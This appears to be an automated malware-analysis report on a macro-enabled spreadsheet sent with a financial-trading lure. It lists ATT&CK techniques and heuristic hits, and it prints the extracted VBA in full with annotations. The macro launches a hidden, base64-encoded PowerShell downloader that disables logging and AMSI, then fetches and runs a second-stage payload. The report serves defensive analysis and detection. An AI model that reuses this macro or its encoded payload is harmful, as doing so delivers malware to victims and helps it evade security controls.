MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that execute automatically when the document is opened; they use CreateObject("WScript.Shell") to run a PowerShell command. That PowerShell command is heavily obfuscated but appears designed to download and execute a second-stage payload. The document body suggests a financial-trading lure intended to trick users into enabling macros.
Heuristics 6
-
VBA project inside OOXML — medium — 5 related findings — OOXML_VBA — Document contains a VBA project — VBA macros present
-
WScript.Shell usage — critical — OLE_VBA_WSCRIPT — WScript.Shell usage — Matched line in script
x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA" Set asd = CreateObject("WScript.Shell") asd.Run (x) -
PowerShell reference in VBA — critical — OLE_VBA_PS — PowerShell reference in VBA — Matched line in script
Dim x As String x = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVg" x = x + "BlAHIAcwBpAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBp" -
CreateObject call — high — OLE_VBA_CREATEOBJ — CreateObject call — Matched line in script
x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA" Set asd = CreateObject("WScript.Shell") asd.Run (x) -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
-
Auto_Open macro — low — OLE_VBA_AUTO — Auto_Open macro — Matched line in script
Attribute VB_Name = "Module1" Sub Auto_Open() pCb
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 7231959c4d4e6787e1120713e912987a1e8911002aa96e5cda0e9b80ae3ffba5) | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8014 bytes |
|||
Preview script — First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Auto_Open is one of the VBA auto-execution entry points: it runs without
' any further user action as soon as macros are enabled. It does nothing
' itself except call pCb, which holds the actual payload logic.
Sub Auto_Open()
pCb
End Sub
' pCb assembles a single PowerShell command line in x and launches it through
' WScript.Shell. The visible prefix uses -noP (no profile), -sta, -w 1
' (hidden window) and -enc (base64-encoded, UTF-16LE command); everything
' after -enc is that encoded command, appended roughly 50 characters per
' line so that no single string literal contains a readable keyword.
' A manual decode of the -enc blob (verify with a full decode before relying
' on it) suggests the command: checks that PowerShell is version 3 or later,
' tampers in-process with ScriptBlock-logging policy and AMSI initialisation
' state, downloads a response over HTTP via System.Net.WebClient using a
' fixed browser-like User-Agent and a Cookie header, decrypts it with an
' RC4-style keystream, and executes the result with IEX. This matches the
' report's "download and execute a second-stage payload" assessment.
' Detection note: because the payload tries to silence PowerShell's own
' logging, the most reliable host signal is process-creation telemetry —
' an Office process spawning "powershell -noP -sta -w 1 -enc ..." — rather
' than ScriptBlock or module logs.
Public Function pCb() As Variant
Dim x As String
' Command-line prefix plus the first fragment of the encoded payload.
x = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVg"
x = x + "BlAHIAcwBpAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBp"
x = x + "AG8ATgAuAE0AQQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJAA1AD"
x = x + "MARgAxAD0AWwByAGUAZgBdAC4AQQBzAHMAZQBtAEIATAB5AC4A"
x = x + "RwBFAHQAVABZAHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbg"
x = x + "BhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAu"
x = x + "AFUAdABpAGwAcwAnACkALgAiAEcARQB0AEYASQBlAGAATABEAC"
x = x + "IAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMA"
x = x + "eQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUA"
x = x + "B1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAk"
x = x + "ADUAMwBGADEAKQB7ACQAQQA2ADUAMwA9ACQANQAzAEYAMQAuAE"
x = x + "cARQB0AFYAYQBsAHUARQAoACQATgB1AGwAbAApADsASQBGACgA"
x = x + "JABBADYANQAzAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbw"
x = x + "BjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAYQA2ADUAMwBb"
x = x + "ACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAG"
x = x + "cAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAA"
x = x + "dABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQ"
x = x + "AwADsAJABhADYANQAzAFsAJwBTAGMAcgBpAHAAdABCACcAKwAn"
x = x + "AGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAG"
x = x + "IAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMA"
x = x + "YQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdg"
x = x + "BBAGwAPQBbAEMAbwBsAEwAZQBjAFQAaQBPAE4AUwAuAEcAZQBu"
x = x + "AEUAUgBJAGMALgBEAGkAQwBUAEkATwBOAEEAUgBZAFsAcwB0AF"
x = x + "IAaQBOAGcALABTAFkAUwB0AGUAbQAuAE8AYgBKAGUAYwBUAF0A"
x = x + "XQA6ADoATgBlAFcAKAApADsAJABWAGEAbAAuAEEAZABkACgAJw"
x = x + "BFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBj"
x = x + "AGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABWAEEAbAAuAE"
x = x + "EAZABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwA"
x = x + "bwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbg"
x = x + "BnACcALAAwACkAOwAkAEEANgA1ADMAWwAnAEgASwBFAFkAXwBM"
x = x + "AE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AG"
x = x + "EAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMA"
x = x + "bwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaA"
x = x + "BlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBM"
x = x + "AG8AZwBnAGkAbgBnACcAXQA9ACQAVgBhAGwAfQBFAGwAcwBFAH"
x = x + "sAWwBTAGMAcgBJAHAAVABCAGwATwBDAGsAXQAuACIARwBFAFQA"
x = x + "RgBpAEUAYABsAEQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcw"
x = x + "AnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABh"
x = x + "AHQAaQBjACcAKQAuAFMARQBUAFYAQQBMAFUAZQAoACQAbgB1AE"
x = x + "wAbAAsACgATgBFAHcALQBPAEIASgBFAEMAdAAgAEMATwBMAEwA"
x = x + "RQBjAFQAaQBvAE4AUwAuAEcAZQBOAEUAcgBJAEMALgBIAGEAUw"
x = x + "BoAFMAZQBUAFsAUwBUAFIAaQBOAGcAXQApACkAfQAkAFIAZQBG"
x = x + "AD0AWwBSAGUARgBdAC4AQQBTAHMARQBtAGIAbAB5AC4ARwBlAH"
x = x + "QAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcA"
x = x + "ZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQ"
x = x + "BzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAEYALgBH"
x = x + "AGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAC"
x = x + "cAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkA"
x = x + "YwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAQQBsAFUAZQ"
x = x + "AoACQATgBVAGwAbAAsACQAdAByAFUAZQApADsAfQA7AFsAUwB5"
x = x + "AHMAVABFAG0ALgBOAEUAVAAuAFMAZQBSAFYAaQBjAEUAUABvAE"
x = x + "kAbgBUAE0AYQBuAEEAZwBFAFIAXQA6ADoARQB4AFAARQBDAFQA"
x = x + "MQAwADAAQwBvAG4AVABJAE4AVQBFAD0AMAA7ACQAMQBmAGYANA"
x = x + "A9AE4AZQB3AC0ATwBCAEoARQBDAHQAIABTAFkAcwB0AGUATQAu"
x = x + "AE4ARQBUAC4AVwBFAEIAQwBsAEkAZQBOAFQAOwAkAHUAPQAnAE"
x = x + "0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcA"
x = x + "cwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcg"
x = x + "BpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAAp"
x = x + "ACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9AC"
x = x + "QAKABbAFQAZQBYAFQALgBFAE4AYwBvAGQASQBOAEcAXQA6ADoA"
x = x + "VQBOAGkAQwBPAGQARQAuAEcAZQBUAFMAdABSAEkATgBHACgAWw"
x = x + "BDAG8ATgB2AEUAcgBUAF0AOgA6AEYAcgBPAG0AQgBBAHMARQA2"
x = x + "ADQAUwB0AFIASQBOAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAE"
x = x + "EAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUA"
x = x + "QQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdQBBAEQAaw"
x = x + "BBAE8AUQBBADYAQQBEAGcAQQBPAEEAQQA0AEEARABnAEEAJwAp"
x = x + "ACkAKQA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAH"
x = x + "AAaABwACcAOwAkADEARgBGADQALgBIAEUAQQBEAEUAcgBzAC4A"
x = x + "QQBEAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQ"
x = x + "ApADsAJAAxAGYAZgA0AC4AUABSAG8AeABZAD0AWwBTAFkAcwB0"
x = x + "AGUAbQAuAE4AZQBUAC4AVwBlAEIAUgBlAHEAVQBlAHMAVABdAD"
x = x + "oAOgBEAGUAZgBBAFUATABUAFcAZQBCAFAAcgBPAHgAeQA7ACQA"
x = x + "MQBGAEYANAAuAFAAUgBvAHgAeQAuAEMAUgBFAGQARQBuAFQAaQ"
x = x + "BBAGwAcwAgAD0AIABbAFMAWQBzAFQARQBNAC4ATgBlAFQALgBD"
x = x + "AHIAZQBEAGUAbgBUAGkAQQBMAEMAYQBDAEgARQBdADoAOgBEAE"
x = x + "UARgBhAHUATAB0AE4ARQB0AFcATwByAGsAQwByAEUAZABlAG4A"
x = x + "VABJAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQ"
x = x + "AgAD0AIAAkADEAZgBmADQALgBQAHIAbwB4AHkAOwAkAEsAPQBb"
x = x + "AFMAWQBzAHQAZQBtAC4AVABFAFgAdAAuAEUAbgBDAG8AZABJAE"
x = x + "4ARwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAVABlAHMA"
x = x + "KAAnADcAbABrACsALgA5AD4AYgAwAHwAMQBtAG4AQAA/ACkAZA"
x = x + "BbACEAcQB7AFYAMgAzACwAcgB6AF0AVABDACUAZgAnACkAOwAk"
x = x + "AFIAPQB7ACQARAAsACQASwA9ACQAQQByAEcAUwA7ACQAUwA9AD"
x = x + "AALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0A"
x = x + "KAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASw"
x = x + "AuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBd"
x = x + "ACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbAC"
x = x + "QAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkA"
x = x + "JQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQ"
x = x + "AlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9"
x = x + "ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAH"
x = x + "gATwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgA"
x = x + "XQApACUAMgA1ADYAXQB9AH0AOwAkADEARgBmADQALgBIAGUAYQ"
x = x + "BEAEUAcgBTAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAi"
x = x + "AHYAcABmAEEAYgBaAEMAYQB1AGsAdABHAEoAWQA9AHcAMABDAH"
x = x + "UASgBEAHoAVwBRAGUAUQAyAFQARABXAGwANABvAHkAUABTAE4A"
x = x + "cAB6AGsAdgBzAD0AIgApADsAJABkAGEAdABBAD0AJAAxAEYAZg"
x = x + "A0AC4ARABPAFcATgBMAG8AYQBEAEQAQQB0AGEAKAAkAHMARQBS"
x = x + "ACsAJABUACkAOwAkAGkAVgA9ACQAZABBAFQAYQBbADAALgAuAD"
x = x + "MAXQA7ACQAZABhAHQAQQA9ACQAZABhAFQAYQBbADQALgAuACQA"
x = x + "RABhAHQAYQAuAEwARQBuAGcAVABIAF0AOwAtAGoATwBpAG4AWw"
x = x + "BDAGgAYQBSAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAg"
x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
' Execution: a late-bound WScript.Shell object runs the assembled command
' line as a child of the Office process. The function sets no return value.
Set asd = CreateObject("WScript.Shell")
asd.Run (x)
End Function
' Exported header of the ThisWorkbook document module. No procedures follow
' it in the extracted source, so this module carries no code of its own.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Exported header of the Sheet1 document module. No procedures follow it in
' the extracted source; all macro logic lives in Module1 above.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
| vbaProject_00.bin (SHA-256: 5f5d78c0e64c9d7da8e7758f822dd2e6b31e7cd605d0550a034cc0604a6f4c12) | vba-project | OOXML VBA project: xl/vbaProject.bin | 24576 bytes |
|||